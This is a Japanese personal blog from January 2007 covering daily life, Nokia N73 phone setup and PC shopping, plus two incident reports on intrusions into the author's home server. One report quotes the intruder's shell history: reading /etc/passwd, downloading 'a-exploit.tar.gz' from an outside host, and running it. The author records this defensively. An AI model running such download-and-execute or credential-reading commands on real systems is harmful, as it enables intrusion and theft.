2007年1月29日
●Brooksのコーヒー
一日だいたい4〜5杯くらいコーヒーを飲んでます。いつもお手軽なBrooksのドリップバッグタイプの、モカ/マイルドブレンド/ヨーロピアンブレンド/コロンビア/グアテマラの5種類が各40袋ずつ(計200袋)入った物をオーダーしてます。でっかい段ボールで届きます。これで3,980円です。一杯あたり約20円ですね。
2007年1月28日
●洗車
このところの小雨で結構汚れたので洗車。まだボディは綺麗に水玉が出来て気持ちいい。
洗車の後、ふらぁ〜っとあてもなく走りに行こうと思ったけど曇ってきたのでやめちゃいました。
2007年1月27日
●24(Twenty Four)シーズン1でスタッフ大写し
ちょっと昔の話になりますが、24(Twenty Four)シーズン1の最終話で、トレーゼン親子と撃ち合いになる直前の桟橋のシーンで、ヘルメットを被ったスタッフがはっきり写っています。
たまたま再放送をやっていて思い出しました。初めて見た時にすぐに気づきました。こんなにはっきり写っているのに、編集の時に気づかなかったんですね。
2007年1月25日
●SoftBank X01NK発表
Softbankケータイの2007年春モデルの発表がありました。なんと14機種58色だそうな。Nokia E61もX01NKとしてラインアップされています。
705NK(Nokia N73)との違いは、QWERTYキー、無線LAN、2.8インチ(QVGA)液晶ですね。カメラは搭載されていないです。しかし、無線LANやQWERTYキーも使えるってのは、かなり便利そうです。
QWERTYキーが装備された端末にはSoftbank X01HTやWILLCOM W-ZERO3などがありますが、スライドしてキーを出さなければならないので片手での操作は無理ですよね。X01NKなら通常のテンキー入力もできるので片手での操作もできそうですね。歩きながらメール確認したり、さっと返事を書いたりしたいので、片手で操作できない端末はNGなんです。
でも残念ながら法人契約専用らしいです。Nokiaオンラインショップで購入できますが、54,800円もします。しかしMMSも使えないらしい。たぶん、SoftbankモデルではMMS使えるんだろうなぁ。
2007年1月24日
●再び侵入されたorz
今度は違うアカウントで侵入してきた。orz
以前と同じようにsshで、さも知ってるアカウントのようにログインしてきた。26分間も居座っている。その場で気づいたらtalk掛けてみたいものだ。
ac805068.ipt.aol.com Tue Jan 23 05:30 - 05:56 (00:26)
このユーザのパスワードを再発行して、パスワードの変更のお願いを出さないとならない。
今回は、ホームディレクトリを持つユーザだったのでshellのヒストリファイルに実行したコマンドの履歴が残っていた。
ls
cd
ls
cd public_html/
ls
emacs index.html
ls -laF
emacs index.html
uname -a
ls -a
cd log
ls -a
cat /etc/passwd
wget geocities.com/paul981ro/a-exploit.tar.gz
uname -r
cat /etc/issue
chmod +x a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
./a-exploit.tar.gz
exit
ウェブページのコンテンツフォルダに入ってindex.htmlをemacsで開いているが、タイムスタンプは変わっていないので改ざんしてないようだ。
その後ウェブのアクセスログが収められているlogフォルダに移動している。
パスワードファイルを眺めた。おそらく新しいアカウント情報を得るためだろう。
ウェブからa-exploit.tar.gzをローカルにコピーした。
実行属性を立てて実行した。
調べてみるとa-exploit.tar.gzという名前のプロセスが動いているではないですか。即座にkillする。
exploitという名前から察するに、セキュリティホールを利用したアタックを掛けるもののようだ。
ネットワークトラフィックを見たところ、目視した感じでは目立ったトラフィックの増大はないようだ。どこかに迷惑をかけてなければ良いけど。
また、maillogには、このアカウントユーザからyouareinusa@gmail.com宛にメールが発信されていたログが残っていた。おそらく起動されていたプロセスが発信したのだろう。
しかし、間抜けな事にyouareinusa@gmail.comはUser Unknownで、エラーメールがこのアカウント宛に戻ってきていた。ちなみにこのアカウントのメールは使用されていない。
エラーで戻ってきたメールの内容を見ると、メールにはpasswdファイル、hostsファイル、www.yahoo-ht2.akadns.netへのpingの結果、uname -aの結果が収められていた。
今回の侵入も以前と同じaolからのアクセスだ。同一犯の可能性が高い。今回のアカウント情報は前回侵入した時に得たアカウント情報をクラックして得た物だとしても、最初の侵入の際はどうしたんだろう。本当に気味が悪い。
passwdファイルを参照しているが、shadowファイルには触れていない。ユーザアカウントの一覧とshellアカウントの有無は得られるが、パスワード(暗号化されているが)は要らないんだろうか。
とりあえずアカウント設定を見直してshellが不要なユーザからは、ログインシェルを外した。sshもメンテナンス用に開けていたが滅多に使わないのでサービスを停止した。外部からのメンテには、特定のホストからのtelnetログインだけ許可しておく事にした。
最初の侵入に至ったヒントはどこから漏れたんだろう。とても気になる。
2007年1月23日
●FLV Online Converter
YouTubeのURLを入力するとNokia N73で再生可能な3GPに変換してくれるサイトです。これは便利ですね。面白い映像見つけたらケータイに放り込んでおけます。
●QRコードリーダ
なんとNokia N73には、今時のケータイには当たり前のQRコードリーダが付いてない。
そこで探してみるとアプリを見つけました。
ScanLifeというものです。以下のサイトの中のQR_Code_for_Nokia_N73_N93.sisをインストールします。
http://www.nokia.com.tw/nokia/0,6771,99450,00.html
●Nokia PC Suiteからメールの発着信
Nokia PC Suiteをインストールすると、ファイルエクスプローラからケータイのファイルへのアクセスができる。こんな風に見えます。
ファイルへのアクセスだけでなく、なんとケータイをバッグに入れたまま、Bluetooth経由でPCからメールのチェックや発信ができちゃうんですよ。す、凄いです。
●Bluetooth USBアダプタ
Nokia N73との通信用にBluetooth USBアダプタ
もう一つ持ってるんですが、オフィスで使おうかと思います。
2007年1月22日
●Nokia N73 Outlook同期
オフィスではOutlookを使って予定を管理してるんだけど、Nokia PC Suiteを使ってBluetooth経由で予定表、電話帳、ToDoを同期できる。もちろんBluetooth経由でN73内をブラウズできるので、カメラで撮影したデータの転送なんかもできる。自動認証をOnにしておけば、N73の操作不要なので鞄に入れっぱなしでアクセス可能だ。むちゃくちゃ便利。
あとは自宅のiCalとの同期環境だけど、使えるようにするにはOSをTigerにアップグレードしないとならない。
●Nokia N73 着信音の設定
Nokia N73では、通常モードとマナーモード以外にいくつでも自由にモードを作れるようになっているんですね。以前から就寝時には、電話は着信音を鳴らすけどメールの着信音はミュートさせる、みたいな就寝モードがあれば便利だと思っていましたが、そんな設定も自由に作って名前を付けて管理することができます。
通常モードとマナーモードの切り替えは#ボタンの長押しで切り替えられます。それ以外のモード切り替えは電源ボタンを短く押すとモードの一覧が出るので、そこから選択できます。使い勝手は良いです。
2007年1月21日
●Nokia N73非通知着信拒否できない
驚いた事に非通知着信拒否機能がないんですね。そんな機能がないケータイが存在するとは知りませんでした。
なんとかならないものか調べてるとAdvanced Call Managerなるアプリケーションを見つけました。しかし売り物で$19.99もします。orz
体験版があったのでインストールして試してみました。30 callまで使用できるそうです。インストールはWindows PC上で、Nokia PC Suiteというソフトウェアを用いて行います。
試してみると、Black ListをRejectしたり、White Listだけを着信したり、非通知をRejectしたり、設定できます。また、Rejectした場合に、BUSY Toneにするのか、転送するのか、着信音をミュートするのか、相手にSMS送信するのか、、、、高機能過ぎます。
単純に非通知だけをRejectできればいいのですが。^^;;
●Nokia N73 iSyncできない
MacのBluetoothでN73を認識させたところ「iSyncを利用してデータとイベントを転送できるようにする」のチェックできなかった。これがチェックできないとiSyncの「デバイスを追加...」にN73が現れない。
もちろんiSync Pluginもインストールしたのですが。
ググった感じでは皆さんうまくいってるようなんですが。どうやら、MAC OS Xのバージョンが低い(10.3.9)のがいけないようです。
2007年1月20日
●ケータイ機種変更
902Tにも飽きてきたので、先週発売になったNokia N73(Softbank 705NK)に機種変更しました。通話の頻度も低いし、メールも着信がメインなので、プラン変更(バリュープラン→ホワイトプラン)しました。
使い勝手は、東芝の日本語入力よりマシであることを期待しています。
新しい機能としては、iCalやOutlookと同期できるスケジュールは便利そう。POP/IMAPでのインターネットメールへのアクセスも可能です。
2007年1月14日
●浜名湖一周
天気がいいので浜名湖をぐるっと回ってきました。海沿いの浜名バイパスは気持ちいいです。
冬のオープンでも、日が射していればエアスカーフとシートヒーターで十分暖かくて快適です。シートヒーターがこんなに快適なアイテムだとは知りませんでした。
久しぶりに友人のお店バイラビに寄ってみました。浜名湖に面したロケーションは最高。お客さんもひっきりなしにやってきて忙しそうです。
写真は、お客さんの子供がシーグラスを並べて作った作品?です。
2007年1月12日
●サイコムのCore2 DuoなPC
Core2 DuoなPCが欲しいと思っていたらMRT氏よりサイコムを教えてもらった。そういえばサイコムってあったなぁ。すっかり記憶から飛んでいました。
ミドルタワーPCなかなかリーズナブルです。欲しい構成(Core2 Duo E6400、Memory 2GB、HDD 250GB、ファンレスのビデオカード、静かなCPUファン、など)で11万円強って感じです。いい感じです。^_^
●サーバに侵入されてしまった
なんと自宅のサーバに侵入されてしまった。
毎朝届くはずのシステムレポートのメールが届かないので確認するとsendmailのプロセスが落ちていた。messagesを確認すると、他にもいくつかのプロセスがメモリのアロケートに失敗して落ちていた。
何が原因でメモリ不足になったんだろうとエラー周辺のログを確認すると、なんと使ってないはずのアユーザカウントでログインした形跡があるじゃないですか! しかもご丁寧にパスワードの変更までしていやがる。
Jan 11 04:56:44 smilemark sshd(pam_unix)[17174]: session opened for user mah by (uid=506)
. . . . . .
Jan 11 06:01:39 smilemark passwd(pam_unix)[18333]: password changed for mah
このmahというアカウント、かなり昔に必要があって作ったのだけど、使わなくなってからずっとそのままになっていた。パスワードなんて何を設定したのかすら覚えていない。もちろんメモもしていないし他人にも教えてない。ちなみにセッション元はaol.comだ。
しばしばSSHブルートフォース(SSHパスワード総あたりアタック)も受けるが、このログインの時間の近傍にはSSHブルートフォースはない。突然、さも当たり前のようにsshでログインしてきている。
しかも、ざっとログを見た感じではこれまでmahというアカウント名でのSSHブルートフォースは受けていないようだ。何をきっかけにこのアカウントの存在とパスワードを知ったのだろう。気味が悪い。
ログイン後、しばらくメモリの使用量と負荷が著しく上がるのがログに残っている。ネットワークトラフィックは目に見えた上昇はないようだ。sendmailを通したメールの送信はないようだけど、直接発信していたら分からない。
いったいサーバ上で何を行ったんだろうか、何か痕跡がないのか調べてみると、/tmpや/var/tmpに痕跡が残っていた。
/tmpの下にはやたら長いAだけで作られたフォルダが2つとUIDをごまかすつもりだっただろうgetuid.cとそれをコンパイルしたらしいシェアードライブラリファイルがあった。
drwxr-xr-x 3 506 507 4096 1月 11 06:01 AAAA . . . . . AAAA/
drwxr-xr-x 3 506 507 4096 1月 11 06:01 AAAA . . . . . AAAAA/
-rw-r--r-- 1 506 507 24 1月 11 06:00 getuid.c
-rwxr-xr-x 1 506 507 6922 1月 11 06:00 getuid.so*
Aでできたとても長い名前のフォルダは何重にもフォルダを重ねた後、take_me.plなどというperlファイルがあった。調べてみると、どうやらsuidperlの脆弱性を利用するものらしい。これらで何かが行えたのかどうかは分からない。
/var/tmp/の下にlocalフォルダが作成されていた、そこには以下の6つのexecutableが置かれていた。これらが何を行う物なのかは不明だ。
-rwxr-xr-x 1 506 507 6182 7月 16 03:53 local*
-rwxr-xr-x 1 506 507 26595 7月 16 03:53 local1*
-rwxr-xr-x 1 506 507 1344 7月 16 03:53 local2*
-rwxr-xr-x 1 506 507 7100 7月 16 03:54 local3*
-rwxr-xr-x 1 506 507 8777 7月 16 03:55 local4*
-rwxr-xr-x 1 506 507 8073 7月 16 03:56 local5*
アカウントは削除して、念のために再起動を行って、不明なプロセスなどが動いていない事を確認して今に至ります。
侵入を受けた経験は初めてじゃないですが、今回のように侵入の手口が分からないとかなり心配になります。再び侵入されないか、何か仕込まれていないか不安です。
2007年1月 9日
●Macworld Expo 2007
間もなく開幕ですね。噂されていた薄いMacBook Pro 12インチ、802.11n対応AirMac Extremeカード、6G iPodなんかを期待しています。^_^
2007年1月 8日
●Core2 DuoなPCが欲しい
現在使っているデスクトップPC(Pentium4 1.6GHz!)がもうかなり古くて力不足だ。iTunesでCD取り込みながら他のことすると重かったり、サクサク動いてくれないんで何かと使いづらいシーンが増えてきた。
しかも、いつの頃からか、サスペンドからの復帰にえらく時間が掛かることが起こるようになってきた。画面が現われるまでにすごく時間が掛かって、ひどい場合は画面が現われてもとてつもなく重い状態がしばらく続いて使用できないのだ。しかたなく何度か強制再起動(電源強制断だ。)したこともある。
これはOS入れ直しても改善できなかった。たぶんWUXGAのディスプレイ使うようになってからのような気がする。もちろんディスプレイ・ドライバも更新しては見たけど改善しない。
こんなこともあって、最近は新しいデスクトップPCが欲しいのだ。でも、熱くなるPentium Dとか、なんとなくトラブルで苦い思い出のあるIntelじゃないチップセットを使うAMDはご免だ。
で、最近いろいろ調べてるけどCore2 DuoのデスクトップPCってなんとも高いですね。試しにDell Dimension 9200やTWOTOP VIPシリーズで、Cure2 Duo E6400(2.13GHz)、メモリ2GBくらいで組むと13万円から16万円くらいになってしまう。OSは不要なのでDellは選択外だな。う~ん、デスクトップPCにこんなに掛けたくないなぁ。しばらく悩みます。
ちなみに、去年の春頃はCore DuoのデスクトップPCに悩んでたんですね。
2007年1月 4日
●バックアップ
前回から2ヶ月ぶりのバックアップ。
バックアップは、rootファイルシステムはdump+gzip、それ以外はtarを用いて他のドライブに丸ごとコピーしている。サイズは120GBくらい。ほぼ4時間掛かる。その間ロードが10を越しているようだ。
